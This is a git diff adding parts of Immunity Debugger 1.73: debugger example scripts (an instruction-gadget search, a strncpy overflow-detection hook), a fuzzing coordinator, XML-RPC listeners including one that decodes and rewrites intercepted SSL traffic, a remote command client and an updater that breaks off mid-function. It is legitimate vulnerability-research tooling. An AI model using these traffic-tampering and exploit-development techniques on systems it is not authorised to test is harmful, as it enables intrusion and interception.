+++ b/1.73/PyScripts/example/searchex.py
@@ -0,0 +1,30 @@
+#!/usr/bin/env python
+"""
+search in one module and in all modules example
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+
+def main():
+ imm = immlib.Debugger()
+ cmd="pop ebx"
+ res=imm.searchCommandsOnModule(0x7C9C1005,cmd)
+ imm.Log("one module")
+ for addy in res:
+ imm.Log( str(addy))
+ res=imm.searchCommands(cmd)
+ imm.Log("all modules")
+ for addy in res:
+ imm.Log( str(addy) )
+
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
\ No newline at end of file
diff --git a/1.73/PyScripts/pe_export.py b/1.73/PyScripts/pe_export.py
new file mode 100755
index 0000000..1cb6eb3
--- /dev/null
+++ b/1.73/PyScripts/pe_export.py
@@ -0,0 +1,42 @@
+#!/usr/bin/env python
+"""
+pe_export.py - a module for Immunity Debugger that exports
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import sys
+if "Libs" not in sys.path:
+ sys.path.append("Libs")
+if "." not in sys.path: sys.path.append(".")
+import pelib
+
+#These imports won't work except from ImmDBG
+import immlib
+from immutils import *
+
+def main():
+ imm = immlib.Debugger()
+ allmodules=imm.getAllModules()
+ for key in allmodules.keys():
+ imm.Log("Found module: %s"%key)
+ usekey=""
+ for key in allmodules.keys():
+ if key.count(".exe"):
+ imm.Log("Found executable to dump %s"%key)
+ usekey=key
+ break
+ module_to_dump=allmodules[key]
+ base=module_to_dump.getCodebase()
+ size=module_to_dump.getCodesize()
+ codememory=imm.readMemory(base,size)
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
\ No newline at end of file
diff --git a/1.73/PyScripts/strncpy_hook.py b/1.73/PyScripts/strncpy_hook.py
new file mode 100755
index 0000000..7b4cd53
--- /dev/null
+++ b/1.73/PyScripts/strncpy_hook.py
@@ -0,0 +1,88 @@
+#!/usr/bin/env python
+"""
+hook on bp strncpy(dest, src, size)
+check if size == strlen(src) log callstack
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.}
+
+"""
+
+__VERSION__ = '1.0'
+
+import immlib
+from immlib import LogBpHook
+import immlib
+
+
+class MyOwnHook(LogBpHook):
+ def __init__(self):
+ LogBpHook.__init__(self)
+
+ def run(self,regs):
+ return
+
+ def run2(self,regs):
+ """This will be executed when hooktype happens"""
+ imm = immlib.Debugger()
+ imm.Error("hgook time")
+ readaddr=""
+ size=""
+ src = regs['ESP'] + 0x8 #strncpy second arg
+ maxlen = regs['ESP'] + 0xc #strncpy third arg
+ res=imm.readMemory(src, 4)
+ leng=imm.readMemory(maxlen,4)
+ for a in res:
+ readaddr="%s%s" % (a.encode('hex'),readaddr)
+ readaddr="0x%s" %readaddr
+ for a in leng:
+ size="%s%s" % (a.encode('hex'),size)
+ src_addr=int(readaddr,16)
+ readed=""
+ #read src arg
+ readed=imm.readString(src_addr)
+ imm.Log("strncpy source: %s" %readed)
+ if len(readed) == int(size):
+ imm.Log("*** STACK ***")
+ callstack=imm.callStack()
+ for a in callstack:
+ imm.Log("Address: %08x - Stack: %08x - Procedure: %s - frame: %08x - called from: %08x" %( a.address,a.stack,a.procedure,a.frame,a.calledfrom))
+
+
+
+def main():
+ imm = immlib.Debugger()
+ bp_address=0x77c47a90 # strncpy
+ #bp_address=imm.setBreakpointOnName("strncpy")
+ #77C47A90 strncpy 8B4C24 0C MOV ECX,DWORD PTR SS:[ESP+C]
+ #imm.setWatchPoint(0x32772DDC) #change to your strncpy address
+
+ logbp_hook = MyOwnHook()
+ logbp_hook.add("bp_on_strncpy",bp_address)
+ imm.Log("Placed strncpy hook: bp_on_strncpy")
+
+
+
+
+
+if __name__=="__main__":
+ print "This module is for use within Immunity Debugger only"
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/1.73/README b/1.73/README
new file mode 100644
index 0000000..811effa
--- /dev/null
+++ b/1.73/README
@@ -0,0 +1,3 @@
+Immunity Debugger v1.73, using Python 2.5
+
+Copyright (C) Immunity, Inc. All Rights Reserved.
diff --git a/1.73/Servers/boo.py b/1.73/Servers/boo.py
new file mode 100755
index 0000000..078ae97
--- /dev/null
+++ b/1.73/Servers/boo.py
@@ -0,0 +1,138 @@
+import asyncore
+import asynchat
+import os
+import string
+import socket
+
+
+
+
+# Globally track all test clients
+test_clients = {}
+
+class boo_channel(asynchat.async_chat):
+
+ def __init__(self, server, sock, addr):
+ asynchat.async_chat.__init__(self, sock)
+ self.set_terminator("||")
+ self.data = ""
+ self.shutdown = 0
+ self.remote_address = addr
+
+ def collect_incoming_data(self, data):
+ self.data = self.data + data
+
+
+ def found_terminator(self):
+
+
+ print self.data
+
+ message = self.data.split("|")
+ # Now depending on what mike has sent us, we want to take certain actions
+ # First case is that we are ready on the ID side to begin testing
+ # Let's pick a port and protocol to munge!
+ if message[0] == "begin_test":
+
+ # Add the client to the global list of test subjects
+ global test_clients
+ test_clients[self.remote_address[0]] = (message[1],message[2])
+ print test_clients
+ print "[*] Received test begin request from %s." % self.remote_address[0]
+
+ # Create the test packet which begins our analysis
+ if message[2] == "tcp":
+ s = socket(AF_INET,SOCK_STREAM)
+ s.connect((self.remote_address[0],int(message[1])))
+
+ # If this thing is bannerable we need some kind of logic here
+ # to handle it. Possible a loop?
+ #test = s.recv(1024)
+ #print test
+
+ else:
+ s = socket(AF_INET,SOCK_DGRAM)
+
+ test_buffer = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnop\r\n"
+ s.send(test_buffer)
+
+ print "[*] Sent %s a test packet of: %s" % (self.remote_address[0],test_buffer)
+
+ self.set_terminator("||")
+ self.close_when_done()
+
+ # We are receiving a graph from Mike, put it in the appropriate
+ # directory with a date, easy of use for trapping different patched
+ # versions of software
+ if message[0] == "graph":
+
+ print self.data
+ print "[*] Mike is Sending a Graph From: %s" % self.remote_address[0]
+
+ # Now we create a directory structure to hold our graphs and other shizzle
+ dir = message[1].split(".")[0]
+ version_dir = message[2].replace(".","_")
+ host_dir = self.remote_address[0]+"_"+message[4]+"_"+message[3]
+ host_dir = host_dir.replace(".","_")
+ iteration_number= message[5]
+ # Create the parent directory based on the binary name
+ try:
+ os.mkdir(dir)
+ except:
+ pass
+
+ # Create the first child based on the binary version
+ try:
+ os.mkdir(dir+"\\\\"+version_dir)
+ except:
+ pass
+
+ # Create the second child based on the test machine that
+ # send the graph
+ try:
+ os.mkdir(dir+"\\\\"+version_dir+"\\\\"+host_dir)
+ except:
+ pass
+
+ # Now write out the graph
+ filename = dir+"\\\\"+version_dir+"\\\\"+host_dir+"\\\\iteration_"+str(iteration_number)+".gdl"
+
+ fd=open(filename,"wb")
+
+ # Clean up the graph output
+ graph = "%s" % message[6]
+
+
+ fd.write(graph)
+
+ fd.close()
+
+
+
+
+
+ # Clean up after ourselves
+ del message
+
+
+
+
+class boo_server(asyncore.dispatcher):
+
+ def __init__(self, port):
+ asyncore.dispatcher.__init__(self)
+ self.create_socket(AF_INET, SOCK_STREAM)
+ self.bind(("", port))
+ self.listen(5)
+
+ def handle_accept(self):
+ conn, addr = self.accept()
+ boo_channel(self, conn, addr)
+
+#
+# try it out
+PORT = 9000
+s = boo_server(PORT)
+print "[*] Boo Listening for Mike Calling on:", PORT, "..."
+asyncore.loop()
+
diff --git a/1.73/Servers/ioctl_listener.py b/1.73/Servers/ioctl_listener.py
new file mode 100755
index 0000000..a44cb46
--- /dev/null
+++ b/1.73/Servers/ioctl_listener.py
@@ -0,0 +1,148 @@
+"""
+IOCTL Listener - to support the ioctl.py PyCommand.
+NOTE: This is all Dave Aitel's XMLRPC code, I just didn't have time to
+whip something up myself.
+"""
+import sys
+from threading import Thread
+import time
+import cPickle
+
+
+class listener_thread(Thread):
+ """
+ This object keeps a thread running for the XML-RPC server to use. Because
+ we use Timeoutsocket, we need to handle socket accept timeouts, which is
+ nice because that way we can also be halted.
+ """
+ def __init__(self, server, debugger_object):
+ self.debugger=debugger_object
+ self.server=server
+ Thread.__init__(self)
+ self.setDaemon(True)
+ self.state="Setup"
+ return
+
+ def run(self):
+ self.state="Running"
+ while 1:
+ if self.state=="HALT":
+ return
+ try:
+ self.server.serve_forever()
+ #except timeoutsocket.Timeout:
+ # pass
+ except:
+ #interupted system call...ignore...(essentially timeout)
+ pass
+
+
+
+ def halt(self):
+ self.state="HALT"
+ return
+
+class listener_instance(object):
+ """
+ Object that stores remote callbacks
+ for XML-RPC
+ """
+ def __init__(self, parent):
+ self.parent=parent #parent is an appgui object
+ self.state="InitialState"
+ return
+
+ def sendioctl(self, arguments):
+ """
+ This is named "sendstate" but from our perspective it is really
+ "getstate".
+
+ debugger_state is a tuple of:
+ dname, regs, modules
+
+ We return either a request for more information or not.
+ """
+ print "Received Request"
+ command = arguments[0]
+ arguments= arguments[1]
+ #devlog("vs", "Got Command: %s"%command)
+ func=getattr(self,"c_%s"%command)
+ if not func:
+ #devlog("vs", "Command %s not found!"%command)
+ return "Command %s not found!"%command
+ ret=func(arguments)
+ #After I return this, I need to sleep a couple seconds to
+ #give the process time to restart, and then resend our attack
+ return ret
+
+
+ def c_registerioctl(self, arguments):
+ print "================================IOCTL REQUEST======================================================"
+ ioctl_hit = cPickle.loads(arguments[0])
+
+ self.log(ioctl_hit)
+
+ return ("Thanks", [])
+
+ def c_registeroutbuffer(self,arguments):
+
+ out_buffer = cPickle.loads(arguments[0])
+ self.log("Out Buffer: %s" % out_buffer)
+ print "================================END REQUEST======================================================"
+
+ return ("Thanks",[])
+
+ def c_startup(self,arguments):
+
+ self.log(arguments[0])
+ return ("Thanks",[])
+
+ def log(self, msg):
+ print msg
+ return
+
+class sql_listener(object):
+ def __init__(self):
+ self.XMLRPCport=80
+ return
+
+ def setupXMLRPCSocket(self):
+ """
+ Listen for XML-RPC requests on a socket
+ """
+ import SimpleXMLRPCServer
+ import threading
+ host="0.0.0.0"
+ if self.XMLRPCport==0:
+ return
+ try:
+ server = SimpleXMLRPCServer.SimpleXMLRPCServer((host, self.XMLRPCport),allow_none=True,logRequests=False)
+ except TypeError:
+ print "2.4 Python did not allow allow_none=True!"
+ server = SimpleXMLRPCServer.SimpleXMLRPCServer((host, self.XMLRPCport))
+ self.log("Set up XMLRPC Socket on %s port %d"%(host, self.XMLRPCport))
+ listener_object=listener_instance(self)
+ server.register_instance(listener_object)
+ #start new thread.
+ lt=listener_thread(server, listener_object)
+ lt.start()
+ self.listener_thread=lt
+ self.listener=listener_object
+ return
+
+ def loop(self):
+ while True:
+ time.sleep(1)
+
+ def log(self, msg):
+ print msg
+ return
+
+if __name__=="__main__":
+ l=sql_listener()
+ #l.XMLRPCport=int(sys.argv[1])
+ l.XMLRPCport = int(5555)
+ l.logRequests = False
+ l.setupXMLRPCSocket()
+
+ l.loop()
\ No newline at end of file
diff --git a/1.73/Servers/sql_listener.py b/1.73/Servers/sql_listener.py
new file mode 100755
index 0000000..c5117b5
--- /dev/null
+++ b/1.73/Servers/sql_listener.py
@@ -0,0 +1,128 @@
+#!/usr/bin/env python
+"""
+SQL Listener - for sqlhooker.py client-side
+"""
+import sys
+from threading import Thread
+import time
+
+
+class listener_thread(Thread):
+ """
+ This object keeps a thread running for the XML-RPC server to use. Because
+ we use Timeoutsocket, we need to handle socket accept timeouts, which is
+ nice because that way we can also be halted.
+ """
+ def __init__(self, server, debugger_object):
+ self.debugger=debugger_object
+ self.server=server
+ Thread.__init__(self)
+ self.setDaemon(True)
+ self.state="Setup"
+ return
+
+ def run(self):
+ self.state="Running"
+ while 1:
+ if self.state=="HALT":
+ return
+ try:
+ self.server.serve_forever()
+ #except timeoutsocket.Timeout:
+ # pass
+ except:
+ #interupted system call...ignore...(essentially timeout)
+ pass
+
+
+
+ def halt(self):
+ self.state="HALT"
+ return
+
+class listener_instance(object):
+ """
+ Object that stores remote callbacks
+ for XML-RPC
+ """
+ def __init__(self, parent):
+ self.parent=parent #parent is an appgui object
+ self.state="InitialState"
+ return
+
+ def sendsql(self, arguments):
+ """
+ This is named "sendstate" but from our perspective it is really
+ "getstate".
+
+ debugger_state is a tuple of:
+ dname, regs, modules
+
+ We return either a request for more information or not.
+ """
+
+ command = arguments[0]
+ arguments= arguments[1]
+ #devlog("vs", "Got Command: %s"%command)
+ func=getattr(self,"c_%s"%command)
+ if not func:
+ #devlog("vs", "Command %s not found!"%command)
+ return "Command %s not found!"%command
+ ret=func(arguments)
+ #After I return this, I need to sleep a couple seconds to
+ #give the process time to restart, and then resend our attack
+ return ret
+
+
+ def c_sqlquery(self, arguments):
+
+ sql_query=arguments[0] #first argument is sql query
+ self.log(sql_query)
+ return ("Thanks", [])
+
+ def log(self, msg):
+ print msg
+ return
+
+class sql_listener(object):
+ def __init__(self):
+ self.XMLRPCport=80
+ return
+
+ def setupXMLRPCSocket(self):
+ """
+ Listen for XML-RPC requests on a socket
+ """
+ import SimpleXMLRPCServer
+ import threading
+ host="0.0.0.0"
+ if self.XMLRPCport==0:
+ return
+ try:
+ server = SimpleXMLRPCServer.SimpleXMLRPCServer((host, self.XMLRPCport),allow_none=True)
+ except TypeError:
+ print "2.4 Python did not allow allow_none=True!"
+ server = SimpleXMLRPCServer.SimpleXMLRPCServer((host, self.XMLRPCport))
+ self.log("Set up XMLRPC Socket on %s port %d"%(host, self.XMLRPCport))
+ listener_object=listener_instance(self)
+ server.register_instance(listener_object)
+ #start new thread.
+ lt=listener_thread(server, listener_object)
+ lt.start()
+ self.listener_thread=lt
+ self.listener=listener_object
+ return
+
+ def loop(self):
+ while True:
+ time.sleep(1)
+
+ def log(self, msg):
+ print msg
+ return
+
+if __name__=="__main__":
+ l=sql_listener()
+ l.XMLRPCport=int(sys.argv[1])
+ l.setupXMLRPCSocket()
+ l.loop()
\ No newline at end of file
diff --git a/1.73/Servers/ssl_listener.py b/1.73/Servers/ssl_listener.py
new file mode 100755
index 0000000..1e1c471
--- /dev/null
+++ b/1.73/Servers/ssl_listener.py
@@ -0,0 +1,309 @@
+#!/usr/bin/env python
+"""
+ssl Listener - for hookssl.py client-side
+
+Use this like:
+/home/me/ImmunityDebugger/ $ python Servers/ssl_listener.py 5555
+
+"""
+import sys
+from threading import Thread
+import time
+import SimpleXMLRPCServer
+import threading
+import base64
+import traceback
+import StringIO
+import gzip
+import re
+if "." not in sys.path: sys.path.append(".")
+from Libs.immutils import *
+
+#Lots of people see a problem and think "I know, I'll use a regular expression!" - now they have two problems
+#dict of compiled and text re's and what we replace it with
+#don't forget to xmlencode this stuff first.
+txtresdict={}
+#txtresdict["something"]="somethingelse"
+
+#now make tuple of (compiled re, replace with)
+for tre in txtresdict:
+ p=re.compile(tre)
+ txtresdict[tre]=(p, txtresdict[tre])
+
+
+def gunzipstring(data):
+ """
+ Gunzip's a string, or throws an exception
+ """
+ datastream=StringIO.StringIO(data)
+ g=gzip.GzipFile(fileobj=datastream)
+ data=g.read()
+ return data
+
+def gzipstring(data):
+ """
+ Gzip's a string to another string using StringIO
+ """
+ datastream=StringIO.StringIO()
+ g=gzip.GzipFile(mode="w",fileobj=datastream)
+ g.write(data)
+ g.close()
+ ret=datastream.getvalue()
+ return ret
+
+CHARS16TEXT="\x9a" #+ intel_short(length) + string
+CHARS8WITHENDELEMENT="\x99" #+ ord(len(string))+string
+CHAR8TEXT="\x98"
+EMPTYTEXTRECORD="\xa8" #good for padding
+ENDELEMENT="\x01"
+def count_end_elements(data, getdata=False ):
+ """
+ Parses the packet starting at the first data string
+ either returns the number of end elements or the
+ original data string (still base64 and gziped)
+ """
+ end_elements=0
+ retdata=[]
+ #print "NBFX parsing: %s"%repr(data)
+ while data!="":
+ if data[0]==CHARS16TEXT:
+ length=istr2halfword(data[1:3])
+ newdata=data[3:3+length]
+ data=data[3+length:]
+ retdata+=[newdata]
+ elif data[0] in [CHAR8TEXT, CHARS8WITHENDELEMENT]:
+ if data[0]==CHARS8WITHENDELEMENT:
+ end_elements+=1
+ length=ord(data[1])
+ newdata=data[2:2+length]
+ data=data[2+length:]
+ retdata+=[newdata]
+ elif data[0]==ENDELEMENT:
+ data=data[1:]
+ end_elements+=1
+ else:
+ print "end_elements not able to parse %2.2x"%ord(data[0])
+ if getdata:
+ return "".join(retdata)
+ return end_elements
+
+def parse_NBFS(payload):
+ """
+ Parse (badly) NBFS/X to get the gziped data out
+ """
+ #print "Parsing NBFS of %d length"%len(payload)
+
+ start=payload.find("Compression\x9a")
+ if start=="-1":
+ return "" #failed
+
+ start=start+len("Compression")
+ #copy all the new data in there
+ base64edzipeddata=count_end_elements(payload[start:], getdata=True)
+ #print "base64 bziped data: %s"%repr(base64edzipeddata)
+ base64data=""
+ try:
+ base64data=base64.decodestring(base64edzipeddata)
+ except:
+ pass
+
+ if base64data=="":
+ print "Nothing to decode in gzip"
+ return ""#nothing to decode
+
+ gzip_decoded=""
+ try:
+ gzip_decoded=gunzipstring(base64data)
+ #print "GZip decoded"
+ except:
+ traceback.print_exc(file=sys.stdio)
+ pass
+
+ if gzip_decoded!="":
+ print "Gzip Data found: %s"%repr(gzip_decoded)
+ return gzip_decoded
+ return ""
+
+
+def replace_NBFS(payload, decoded_payload):
+ """
+ Takes original code and base64 gzip decoded payload
+ """
+ data_to_add=base64.encodestring(gzipstring(decoded_payload)).strip()
+ start=payload.find("Compression\x9a")
+ if start=="-1":
+ return "" #failed
+
+ start=start+len("Compression")
+ #copy all the new data in there
+ end_elements=count_end_elements(payload[start:])
+ #print "End elements found: %d"%end_elements
+ newdata=payload[:start]
+
+ #now our new payload - we only add payloads of 256 bytes or less.
+ #not sure why the server hates larger payloads, but it does.
+ while data_to_add!="":
+ d=data_to_add[:256]
+ newdata+=CHARS16TEXT+intel_short(len(d))+d
+ data_to_add=data_to_add[256:]
+
+ #now end all elements we need to end
+ newdata+=ENDELEMENT*end_elements
+ #now pad out forever
+ newdata+=EMPTYTEXTRECORD*1000
+ newdata=newdata[:len(payload)]
+ print "Olddata(%d)=%s"%(len(payload),repr(payload))
+ print "Newdata(%d)=%s"%(len(newdata),repr(newdata))
+ return newdata
+
+
+class listener_thread(Thread):
+ """
+ This object keeps a thread running for the XML-RPC server to use. Because
+ we use Timeoutsocket, we need to handle socket accept timeouts, which is
+ nice because that way we can also be halted.
+ """
+ def __init__(self, server, debugger_object):
+ self.debugger=debugger_object
+ self.server=server
+ Thread.__init__(self)
+ self.setDaemon(True)
+ self.state="Setup"
+ return
+
+ def run(self):
+ self.state="Running"
+ while 1:
+ if self.state=="HALT":
+ return
+ try:
+ self.server.serve_forever()
+ #except timeoutsocket.Timeout:
+ # pass
+ except:
+ #interupted system call...ignore...(essentially timeout)
+ pass
+
+
+
+ def halt(self):
+ self.state="HALT"
+ return
+
+class listener_instance(object):
+ """
+ Object that stores remote callbacks
+ for XML-RPC
+ """
+ def __init__(self, parent):
+ self.parent=parent #parent is an appgui object
+ self.state="InitialState"
+ return
+
+ def senddata(self, arguments):
+ """
+ This is named "senddata" but from our perspective it is really
+ "getdata".
+
+ debugger_state is a tuple of:
+ dname, regs, modules
+
+ We return either a request for more information or not.
+ """
+
+ command = arguments[0]
+ arguments= arguments[1]
+ #devlog("vs", "Got Command: %s"%command)
+ func=getattr(self,"c_%s"%command)
+ if not func:
+ #devlog("vs", "Command %s not found!"%command)
+ return "Command %s not found!"%command
+ ret=func(arguments)
+ return ret
+
+
+ def c_ssldata(self, arguments):
+
+ payload=arguments[0] #first argument is our payload
+ payload=base64.decodestring(payload)
+ self.log(repr(payload))
+ decodeddata=""
+ if payload[:2]=="\x56\x02":
+ #s:Envelope
+ #start of MC-NBFS for our sample data
+ #in reality there's no way to know this, except to know the protocol you
+ #are looking at...
+ #what we have here is NBFS which is really NBFX
+ decodeddata=parse_NBFS(payload)
+ if decodeddata:
+ #now do our regular expression work
+ for key in txtresdict:
+ print "Matching with regex %s"%key
+ p, replacewith = txtresdict[key]
+ result=p.search(decodeddata)
+ #if not result:
+ # print "Did not match %s with data %s"%(key, decodeddata)
+ if result:
+ #print "Matched %s"%key
+ groupvalue=result.group(0)
+ if groupvalue:
+ print "Replacing %s with %s"%(repr(groupvalue), repr(replacewith))
+ decodeddata=decodeddata.replace(groupvalue,replacewith)
+ #ok, now we have new data, but we still have to put it in our string!
+ payload=replace_NBFS(payload, decodeddata)
+ if not payload:
+ #some fail in replace_NBFS
+ print "Failed to replace NBFS data!"
+ return ("LEAVEALONE", [])
+ #encode it for transmission - should not have to do this, but whateva'
+ payload=base64.encodestring(payload)
+ return ("REPLACE",[payload])
+
+ #file("decodeddata.txt","ab").write("payload: %s\ndecodeddata=%s\n"%(payload, decodeddata))
+
+ return ("LEAVEALONE", [])
+
+ def log(self, msg):
+ print msg
+ return
+
+class ssl_listener(object):
+ def __init__(self):
+ self.XMLRPCport=80
+ return
+
+ def setupXMLRPCSocket(self):
+ """
+ Listen for XML-RPC requests on a socket
+ """
+ host="0.0.0.0"
+ if self.XMLRPCport==0:
+ return
+ try:
+ server = SimpleXMLRPCServer.SimpleXMLRPCServer((host, self.XMLRPCport),allow_none=True)
+ except TypeError:
+ print "2.4 Python did not allow allow_none=True!"
+ server = SimpleXMLRPCServer.SimpleXMLRPCServer((host, self.XMLRPCport))
+ self.log("Set up XMLRPC Socket on %s port %d"%(host, self.XMLRPCport))
+ listener_object=listener_instance(self)
+ server.register_instance(listener_object)
+ #start new thread.
+ lt=listener_thread(server, listener_object)
+ lt.start()
+ self.listener_thread=lt
+ self.listener=listener_object
+ return
+
+ def loop(self):
+ while True:
+ time.sleep(1)
+
+ def log(self, msg):
+ print msg
+ return
+
+if __name__=="__main__":
+ l=ssl_listener()
+ l.XMLRPCport=int(sys.argv[1])
+ l.setupXMLRPCSocket()
+ l.loop()
\ No newline at end of file
diff --git a/1.73/Tools/cmdcli.py b/1.73/Tools/cmdcli.py
new file mode 100755
index 0000000..f7a9be5
--- /dev/null
+++ b/1.73/Tools/cmdcli.py
@@ -0,0 +1,213 @@
+#!/usr/bin/env python
+"""
+Immunity Debugger Command Line Client
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} Remote Command Line Client
+"""
+
+import socket
+import sys
+
+"""
+NOTE: Most of this cmdclient comes from Bas's PDB client
+"""
+
+__VERSION__ = '1.0'
+
+
+
+class clientCore():
+ def __init__(self,ip,port):
+ self.ip=ip
+ self.port=port
+ self.s=None
+
+ return
+
+ def writeLine(self, line):
+ sys.stdout.write(line)
+ sys.stdout.flush()
+ return
+
+ def readLine(self):
+ line = sys.stdin.readline()
+ sys.stdin.flush()
+ return line
+
+ def getCommandLine(self, prompt):
+ self.writeLine(prompt)
+ try:
+ line = self.readLine()
+ except:
+ line = None
+ return line
+
+ def listCommands(self):
+
+ cmd = "Available commands:\n\n"
+ cmd +="Expressions"
+ cmd +="==========="
+ cmd +="\n"
+ cmd +="= expression Ditto"
+ cmd +="WATCH expression Add watch"
+ cmd +="W expression Ditto"
+ cmd +="Disassembler"
+ cmd +="============"
+ cmd +="\n"
+ cmd +="U expresion Follow address in Disassembler"
+ cmd +="ORIG Go to actual EIP"
+ cmd +="\n"
+ cmd +="Dump and stack"
+ cmd +="=============="
+ cmd +="\n"
+ cmd +="D expression Follow address in dump"
+ cmd +="DUMP expression Ditto"
+ cmd +="DA [expression] Dump in assembler format"
+ cmd +="DB [expression] Dump in hex byte format"
+ cmd +="DC [expression] Dump as ASCII text"
+ cmd +="DS [expression] Dump as addresses (stack format)"
+ cmd +="DU [expression] Dump as UNICODE text"
+ cmd +="DW [expression] Dump in hex word format"
+ cmd +="STK expression Follow address in stack"
+ cmd +="\n"
+ cmd +=" Assembling"
+ cmd +=" =========="
+ cmd +="\n"
+ cmd +="A expression [,command] Assemble at address"
+ cmd +="\n"
+ cmd +="Labels and comments"
+ cmd +="==================="
+ cmd +="\n"
+ cmd +="L expression, label Assign symbolic label to address"
+ cmd +="C expression, comment Set comment at address"
+ cmd +="\n"
+ cmd +="Breakpoint commands"
+ cmd +="==================="
+ cmd +="\n"
+ cmd +="BP expression [,condition] Set INT3 breakpoint at address"
+ cmd +="BPX label Set breakpoint on each call to external 'label' within the current module"
+ cmd +="BPD label Delete breakpoint on each call"
+ cmd +="BC expression Delete breakpoint at address"
+ cmd +="CLEAR expression Delete breakpoint at address"
+ cmd +="BR expression1 [,expression2] Set memory breakpoint on access to range"
+ cmd +="BW expression1 [,expression2] Set memory breakpoint on write to range"
+ cmd +="BMD Remove memory breakpoint"
+ cmd +="HR expression Set 1-byte hardware breakpoint on access to address"
+ cmd +="HW expression Set 1-byte hardware breakpoint on write to address"
+ cmd +="HE expression Set hardware breakpoint on execute at address"
+ cmd +="HD [expression] Remove hardware breakpoint(s) at address"
+ cmd +="\n"
+ cmd +="Tracing commands"
+ cmd +="================"
+ cmd +="\n"
+ cmd +="STOP Pause execution"
+ cmd +="PAUSE Ditto"
+ cmd +="RUN Run program"
+ cmd +="G [expression] Run till address"
+ cmd +="GE [expression] Pass exception to handler and run till address"
+ cmd +="S Step into"
+ cmd +="P Step over"
+ cmd +="TA [expression] Trace in till address"
+ cmd +="TO [expression] Trace over till address"
+ cmd +="TC condition Trace in till condition"
+ cmd +="TOC condition Trace over till condition"
+ cmd +="TR Execute till return"
+ cmd +="TU Execute till user code"
+ cmd +="\n"
+ cmd +="Immunity Debugger windows"
+ cmd +="========================="
+ cmd +="\n"
+ cmd +="LOG View Log window"
+ cmd +="MOD View Executable modules"
+ cmd +="MEM View Memory window"
+ cmd +="CPU View CPU window"
+ cmd +="KB View Call Stack"
+ cmd +="BRK View Breakpoints"
+ cmd +="INFO View Breakpoints"
+ cmd +="OPT Edit options"
+ cmd +="\n"
+ cmd +="Miscellaneous commands"
+ cmd +="======================"
+ cmd +="\n"
+ cmd +="![pycmd] [arg1] [arg2] [argN] Executes PyCommand"
+ cmd +="EXIT Closes this shell"
+ cmd +="OPEN [filename] Open executable file for debugging"
+ cmd +="PYRUN python filename Run python script"
+ cmd +="RUNPY python filename Run python script"
+ cmd +="CLOSE Close debugged program"
+ cmd +="RST Restart current program"
+ cmd +="VCG address Graph given address"
+ cmd +="GRAPH address Graph given address"
+ cmd +="HELP Show this help"
+ cmd +="\n"
+ cmd +="\n"
+ cmd +="Commands are not case-sensitive, parameters in brackets are optional. "
+ cmd +="Expressions may include constants, registers and memory references and "
+ cmd +="support all standard arithmetical and boolean functions. "
+ cmd +="By default, all constants are hexadecimal."
+ cmd +="To mark constant as decimal, follow it with decimal point. Examples:"
+ cmd +=" 2+2 - calculate value of this expression;"
+ cmd +=" AT [EAX+10] - disassemble at address that is the contents of memory doubleword at address EAX+0x10;"
+ cmd +=" BP KERNEL32.GetProcAddress - set breakpoint on API function. Note that you can set breakpoint in system DLL only in NT-based operating systems;"
+ cmd +=" BPX GetProcAddress - set breakpoint on every call to external function GetProcAddress in the currently selected module;"
+ cmd +=" BP 412010,EAX==WM_CLOSE - set conditional breakpoint at address 0x412010. Program pauses when EAX is equal to WM_CLOSE."
+ self.writeLine(cmd)
+ return
+
+
+ def exitCmdCli(self):
+ self.writeLine("Exiting...\n")
+ self.s.send("disconnect\n")
+ self.s.close()
+ sys.exit(1)
+
+
+ def handleCommand(self, cmd):
+ rcmd=cmd.replace("\n","")
+ if rcmd == "help":
+ self.listCommands()
+ elif rcmd == "quit" or rcmd == "exit":
+ self.exitCmdCli()
+ else:
+ self.s.send(rcmd+"\n")
+ answer=self.s.recv(512)
+ if len(answer) > 0:
+ self.writeLine(answer+"\n")
+
+
+
+ def connectToImmdbg(self):
+ self.s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
+ try:
+ self.s.connect((self.ip,self.port))
+ except:
+ self.writeLine("Could not connect...\n")
+ self.exitCmdCli()
+
+
+
+
+def main():
+ if len(sys.argv) < 3:
+ print "Usage: %s ip port" % sys.argv[0]
+ sys.exit(0)
+ ip=sys.argv[1]
+ port=int(sys.argv[2])
+ client=clientCore(ip,port)
+ client.connectToImmdbg()
+ while 1:
+ line = client.getCommandLine("ImmunityDebugger> ")
+ if line == None:
+ continue
+ client.handleCommand(line)
+
+ return
+
+
+
+
+if __name__=="__main__":
+ main()
\ No newline at end of file
diff --git a/1.73/Tools/getupdate.py b/1.73/Tools/getupdate.py
new file mode 100755
index 0000000..d66a061
--- /dev/null
+++ b/1.73/Tools/getupdate.py
@@ -0,0 +1,98 @@
+#!/usr/bin/python
+"""
+Immunity Debugger Updater Lib
+
+(c) Immunity, Inc. 2004-2007
+
+
+U{Immunity Inc.} Immunity Debugger Updater Lib
+
+
+*DONT MESS WITH THIS FILE*
+
+"""
+
+__VERSION__ = '1.0'
+
+import time
+import urllib
+import sys
+import os
+import string
+import md5
+from threading import Thread
+
+class testit(Thread):
+ def __init__ (self,file):
+ Thread.__init__(self)
+ self.file = file
+ self.status = -1
+ def run(self):
+ sys.stdout.write("Updating: %s\n["%self.file)
+ while self.status == -1:
+ sys.stdout.write("*")
+ time.sleep(0.2)
+ sys.stdout.write("] - Finished!\n")
+
+
+
+def doDownload(file):
+ filetodownload=file
+ URL="https://auth.immunityinc.com/ImmunityDebugger/update/"
+ #first we parse the file filename:md5sum
+ (file,md5sum)=file.split(":")
+ md5sum=md5sum.replace("\n","").replace("\r","")
+ #separate dir and file
+ (dir,filename)=os.path.split(file)
+ #try to make directory in case it didnt existed
+ try:
+ os.makedirs(dir)
+ except OSError, err:
+ pass
+ try:
+ checkf=open(file,"rb")
+ md52check=md5.new(checkf.read()).hexdigest()
+ checkf.close()
+ except:
+ md52check="0"
+ if md52check == md5sum:
+ print "MD5SUM: %s , skipping file %s" % (md5sum,filename)
+ else:
